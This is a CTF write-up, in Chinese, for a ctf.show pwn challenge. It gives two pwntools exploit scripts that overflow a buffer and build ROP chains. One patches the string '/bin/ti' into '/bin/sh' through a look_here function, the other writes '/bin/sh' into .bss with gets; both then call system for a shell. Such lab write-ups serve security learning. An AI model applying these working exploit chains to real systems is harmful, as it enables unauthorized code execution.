0x00 第一种方法
查找字符串发现了可疑的/bin/ti

ROPgadget --binary pwn --string "ti"
获得ti的位置:
Strings information ============================================================ 0x000000000060104d : ti
有可以利用的函数look_here，它会把传入地址处的前两个字节各减1（ascii-1）:
/*
 * look_here (IDA decompilation): decrements, in place, the two bytes starting
 * at a1 (each byte's value drops by one) and returns a pointer to the second
 * byte, i.e. a1 + 1.  The loop runs exactly twice.
 */
_BYTE *__fastcall look_here(_BYTE *a1)
{
    _BYTE *cursor = a1;   /* walks forward one byte per iteration */
    _BYTE *result = 0;    /* pointer saved before the post-increment */
    int idx;

    for (idx = 0; idx < 2; ++idx)
    {
        result = cursor;  /* same value the original stores: position before ++ */
        *cursor -= 1;     /* equivalent of --*a1 */
        ++cursor;         /* equivalent of a1++ */
    }
    return result;
}
exp，结尾需要加一个ret来平衡栈:
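from pwn import *
from LibcSearcher import *

# Target binary, loaded to resolve symbol addresses.
elf = ELF('./pwn')

# 1 = run the binary locally, anything else = connect to the challenge server.
local = 1
if local == 1:
    io = process('./pwn')
else:
    io = remote('pwn.challenge.ctf.show', 28133)

# Addresses as listed in the writeup above.
system_addr = elf.symbols['system']
pop_rdi_ret = 0x0000000000400733
ti = 0x000000000060104d           # "ti" string located with ROPgadget
binsh = 0x601048                  # start of the "/bin/ti" string (ti is 5 bytes further on)
lookhere = 0x40062D               # look_here(): decrements the two bytes at the address in rdi
ret = 0x00000000004004d1          # extra `ret` the writeup adds to balance the stack

# Build the chain as bytes.  The original 'a' * 0x2A0 + p64(...) raises
# TypeError on Python 3 (str cannot be concatenated with bytes); b'a' behaves
# the same on Python 2 and 3.
payload = b''.join([
    b'a' * 0x2A0,
    p64(0xdeadbeef),
    p64(pop_rdi_ret), p64(ti), p64(lookhere),   # look_here(ti)
    p64(pop_rdi_ret), p64(binsh),
    p64(ret),
    p64(system_addr),                           # system(binsh)
])
io.sendline(payload)
io.interactive()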
0x01 第二种方法
不需要使用函数look_here，因为题中给了gets函数，利用它写一个“/bin/sh”即可。
需要把“/bin/sh”写入bss段中:

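from pwn import *
from LibcSearcher import *

# Target binary, loaded to resolve symbol addresses.
elf = ELF('./pwn')

# 1 = run the binary locally, anything else = connect to the challenge server.
local = 0
if local == 1:
    io = process('./pwn')
    #gdb.attach(io,'b * 0x04006B2')
else:
    io = remote('pwn.challenge.ctf.show', 28133)

# Addresses as listed in the writeup above.
system_addr = elf.symbols['system']
gets_addr = elf.symbols['gets']
bss = 0x00601800                  # writable .bss location that receives the second line
ret = 0x00000000004004d1          # extra `ret` the writeup adds to balance the stack
pop_rdi_ret = 0x0000000000400733

# Build the chain as bytes.  The original 'a' * 0x2A0 + p64(...) raises
# TypeError on Python 3 (str cannot be concatenated with bytes); b'a' behaves
# the same on Python 2 and 3.
payload = b''.join([
    b'a' * 0x2A0,
    p64(0xdeadbeef),
    p64(pop_rdi_ret), p64(bss), p64(gets_addr),   # gets(bss)
    p64(pop_rdi_ret), p64(bss),
    p64(ret),
    p64(system_addr),                             # system(bss)
])
io.sendline(payload)
io.sendline(b'/bin/sh')   # the line gets() stores at bss; bytes for Python 3 compatibility
io.interactive()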